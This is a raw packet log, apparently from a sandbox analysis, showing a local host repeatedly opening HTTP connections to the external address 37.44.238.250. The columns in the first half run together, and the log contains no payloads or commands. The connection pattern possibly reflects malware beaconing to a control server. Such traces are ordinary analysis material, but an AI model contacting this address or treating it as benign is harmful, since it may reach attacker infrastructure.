                                                          Oct 1, 2024 05:58:21.701327085 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.706218958 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.058988094 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.063960075 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.327554941 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.371412039 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.461812019 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.512032986 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.585176945 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.585796118 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.590409040 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.590485096 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.590580940 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.590643883 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.590749025 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.595488071 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.949644089 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.954783916 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.225852013 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.277870893 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.358979940 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.402847052 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.476536036 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.477133036 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.481726885 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.481863022 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.481889009 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.481957912 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.482027054 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.488132954 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.762716055 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.810496092 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.880852938 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.885935068 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.886069059 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.887305021 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.892138004 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.927504063 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.927565098 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.098941088 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.100765944 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.105710983 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.105859041 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.105957031 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.110738993 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.246484995 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.251558065 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.251877069 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.465333939 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.470468044 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.509949923 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.558883905 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.640865088 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.684048891 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.711977959 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.762022972 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.841279984 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.887190104 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.961201906 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.961209059 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.961883068 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.966490984 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.966634035 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.966900110 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.966972113 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.967103958 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.967396021 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.967447996 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.971873999 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.324632883 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.329544067 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.582802057 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.637056112 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.719170094 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.762110949 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.846071005 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.850974083 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.851038933 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.851136923 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.855895042 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.200103045 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.205075979 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.467844963 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.512005091 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.599069118 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.652684927 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.735166073 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.736490011 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.740353107 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.740407944 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.741292000 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.741394043 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.741493940 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.746234894 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.090369940 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.095508099 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.385956049 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.433929920 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.518934011 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.558912992 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.635472059 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.637851954 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.639585972 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.643054008 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.643158913 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.644392014 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.644469023 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.644674063 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.649497032 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.013705969 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.018663883 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.307374001 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.355808973 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.476569891 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.527682066 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.602344990 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.603027105 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.607424021 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.607498884 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.607804060 CEST804977737.44.238.250192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 1, 2024 05:58:28.607958078 CEST  49777        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:28.608047962 CEST  49777        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:28.612847090 CEST  80           49777      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:28.994798899 CEST  49777        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:28.999910116 CEST  80           49777      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.283915997 CEST  80           49777      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.340123892 CEST  49777        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.453268051 CEST  80           49777      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.496476889 CEST  49777        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.572704077 CEST  49777        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.573381901 CEST  49778        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.577850103 CEST  80           49777      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.577924967 CEST  49777        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.578197002 CEST  80           49778      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.578272104 CEST  49778        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.578380108 CEST  49778        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.583198071 CEST  80           49778      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.653233051 CEST  49778        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.653907061 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.658803940 CEST  80           49779      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.658930063 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.659058094 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.663796902 CEST  80           49779      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.702469110 CEST  80           49778      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.774810076 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.779745102 CEST  80           49780      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:29.779920101 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.780047894 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:29.784842968 CEST  80           49780      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.012703896 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.015635014 CEST  80           49778      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.015714884 CEST  49778        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.017668009 CEST  80           49779      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.017843962 CEST  80           49779      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.137315035 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.142246008 CEST  80           49780      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.271312952 CEST  80           49779      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.324526072 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.392115116 CEST  80           49780      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.433923960 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.466042995 CEST  80           49779      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.512250900 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.521591902 CEST  80           49780      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.574538946 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.651838064 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.651918888 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.653089046 CEST  49781        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.657001019 CEST  80           49779      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.657052994 CEST  49779        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.657639027 CEST  80           49780      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.657680988 CEST  49780        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.657898903 CEST  80           49781      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:30.657973051 CEST  49781        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.658114910 CEST  49781        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:30.662863016 CEST  80           49781      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:31.012473106 CEST  49781        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:31.017390013 CEST  80           49781      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:31.327713013 CEST  80           49781      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:31.371408939 CEST  49781        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:31.461033106 CEST  80           49781      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:31.461374998 CEST  49781        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:31.466511011 CEST  80           49781      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:31.466569901 CEST  49781        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:31.682188988 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:31.687114000 CEST  80           49782      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:31.687208891 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:31.776818037 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:31.781645060 CEST  80           49782      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:32.121800900 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.126837969 CEST  80           49782      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:32.319478035 CEST  80           49782      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:32.371500969 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.492397070 CEST  80           49782      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:32.543262005 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.618829012 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.619560003 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.624102116 CEST  80           49782      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:32.624164104 CEST  49782        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.624346018 CEST  80           49783      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:32.624463081 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.624578953 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.629302979 CEST  80           49783      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:32.980937004 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:32.986026049 CEST  80           49783      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:33.259522915 CEST  80           49783      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:33.309017897 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.395345926 CEST  80           49783      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:33.449567080 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.507903099 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.508558035 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.513066053 CEST  80           49783      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:33.513382912 CEST  80           49784      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:33.513457060 CEST  49783        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.513483047 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.513641119 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.518464088 CEST  80           49784      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:33.871493101 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:33.876553059 CEST  80           49784      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:34.148068905 CEST  80           49784      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:34.199537992 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.283062935 CEST  80           49784      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:34.324534893 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.415194035 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.415515900 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.420432091 CEST  80           49784      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:34.420500040 CEST  80           49785      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:34.420504093 CEST  49784        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.420577049 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.421612978 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.426409960 CEST  80           49785      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:34.777877092 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:34.782855034 CEST  80           49785      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.026133060 CEST  80           49785      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.074534893 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.153289080 CEST  80           49785      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.199721098 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.273246050 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.273988962 CEST  49786        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.278434992 CEST  80           49785      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.278526068 CEST  49785        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.278786898 CEST  80           49786      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.278873920 CEST  49786        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.278979063 CEST  49786        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.283775091 CEST  80           49786      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.503324032 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.503446102 CEST  49786        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.508184910 CEST  80           49787      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.508284092 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.508404016 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.513140917 CEST  80           49787      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.550368071 CEST  80           49786      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.645013094 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.649868011 CEST  80           49788      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.649921894 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.650032043 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.654762983 CEST  80           49788      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.730129004 CEST  80           49786      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.730185032 CEST  49786        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.857446909 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:35.862335920 CEST  80           49787      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.862377882 CEST  80           49787      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:35.996474981 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.001821995 CEST  80           49788      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.119774103 CEST  80           49787      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.168262959 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.253523111 CEST  80           49787      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.275450945 CEST  80           49788      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.293266058 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.324518919 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.408927917 CEST  80           49788      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.449515104 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.539263964 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.539351940 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.540102005 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.544748068 CEST  80           49787      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.544769049 CEST  80           49788      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.544811964 CEST  49787        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.544845104 CEST  49788        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.544926882 CEST  80           49789      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.545311928 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.545548916 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.550292015 CEST  80           49789      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:36.906353951 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:36.911295891 CEST  80           49789      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:37.158543110 CEST  80           49789      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:37.199527025 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.285557032 CEST  80           49789      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:37.340154886 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.420150042 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.420674086 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.425343990 CEST  80           49789      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:37.425463915 CEST  80           49790      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:37.425518036 CEST  49789        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.425555944 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.425664902 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.430413008 CEST  80           49790      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:37.777894020 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:37.782785892 CEST  80           49790      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:38.052000046 CEST  80           49790      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:38.105882883 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.232135057 CEST  80           49790      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:38.277740955 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.354043961 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.354717016 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.359267950 CEST  80           49790      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:38.359527111 CEST  80           49791      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:38.359586954 CEST  49790        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.359620094 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.359731913 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.364439011 CEST  80           49791      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:38.715250015 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:38.720453024 CEST  80           49791      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:38.966089964 CEST  80           49791      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:39.012180090 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.107497931 CEST  80           49791      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:39.152678967 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.226917028 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.227469921 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.232067108 CEST  80           49791      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:39.232153893 CEST  49791        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.232399940 CEST  80           49792      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:39.232472897 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.232589960 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.237401962 CEST  80           49792      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:39.590984106 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.596066952 CEST  80           49792      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:39.847886086 CEST  80           49792      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:39.902707100 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:39.987871885 CEST  80           49792      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.043303013 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.101641893 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.102320910 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.106976986 CEST  80           49792      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.107062101 CEST  49792        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.107424021 CEST  80           49793      37.44.238.250  192.168.2.6
